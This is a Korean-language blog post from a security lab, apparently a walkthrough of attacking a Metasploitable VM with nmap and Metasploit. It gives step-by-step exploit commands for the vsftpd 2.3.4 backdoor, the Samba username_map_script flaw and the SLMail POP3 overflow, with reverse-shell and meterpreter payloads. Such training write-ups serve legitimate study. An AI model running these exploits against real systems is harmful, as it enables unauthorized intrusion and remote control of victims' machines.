2018. 7. 31.

[metasploitable] nmap, 메타스플로잇, 인터프리터

service postgresql start // postgresql 실행
msfdb init // db를 초기화 한다.

msfconsole
db_status // db가 잘 연결되어있는지 확인 할 수 있다.

nessus 결과나, sparta, nmap 등을 통해 나온 결과를 통해 공격 취약점을 선별한다.

db_nmap 192.168.56.107 -sV



# vsftp 2.3.4 공격
위 결과 중 21번 포트에 vsftpd 2.3.4 가 동작 중인 것을 알 수 있다.

vsftpd 2.3.4 버취약함이 존재하는지 확인하려면
search vsftpd 라고 입력한다. 검색 속도가 느리다면 db_rebuild_cache 라고 입력하면 속도가 빨라진다


검색 결과 2.3.4 버전 모듈이 존재한다. excellent 랭크를 보아하니 작동률이 아주 높다는 것이다.

use exploit/unix/ftp/vsftpd_234_backdoor
show options



현재 RHOST 부분 설정이 비어있으므로 세팅을 해야한다. set 명령어로 셋팅을 하고나면 다음과 같이 데이터가 삽입된다.


모든 준비가 완료되었고 run 을 입력하면 공격이 수행되며, 그 결과로 쉘을 찾을 수 있다.


진행하고 있는 공격을 ctrl z 명령어로 백그라운드에 돌리고 sessions 명령어로 원하는 세션만 가져올 수도 있다.

# SAMBA 취약점 공격

nmap 결과를 보면 samba smbd 3.x - 4.x  라고 표시되어 있다. 버전을 정확히 알기 위해서 다음 명령어를 수행한다.

use auxiliary/scanner/smb/smb_version

auxiliary 는 쉘을 얻어내는것이 아니라 정보를 얻어낼 때 사용한다.


search samba 로 공격 모듈을 검색해보면 상당히 많이 나온다. 이것을 일일이 실행하는것은 좋은 방법이 아니다. 왜냐하면 공격시스템의 메모리가 과부화되어 다운 될 수도 있기 때문이다. 최대한 정확한 모듈을 찾는것이 좋은데 이럴때 구글을 활용하면 좋다.
구글에서 samba 3.0.20 metasploit 이라고 검색한다.


username map script 라는 스크립트를 찾았다. search username_map_script 로 검색한 후 공격을 수행하면 된다. 수행 결과 관리자 쉘을 얻을 수 있다.

실행하기 전에 페이로드를 사용해 본다. 공격이 성공하고 난 후 어떤 작업을 할지 정해주는 것이다. show payloads 를 입력하면 해당 모듈안에서 사용할 수 있는 payloads를 볼 수 있다. 방화벽이 있는 공격 대상의 경우 reverse shell 공격을 해야하므로 이때 유용하게 사용된다.

show payloads 로 확인 한 후 set payload cmd/unix/bind_perl 명령어로 페이로드를 지정한다.  (reverse 쉘을 이용하려면 /cmd/unix/reverse 를 입력한 후 공격을 수행한다.

단 reverse 쉘을 수행하려면 아래의 LHOST를 자신의 IP로 입력해야 한다. 서버쪽에서 해커의 PC로 붙어야 하기 때문이다.



# SLMAL 취약점 공격

use windows/pop3/seattlelab_pass
set payload windows/meterpreter/reverse_tcp



meterpreter 프롬프트를 띄워준다.  meterpreter 는 기존 쉘 보다 더 강력한 기능을 많이 제공한다.



Popular Posts

Recent Posts

Blog Archive

Powered by Blogger.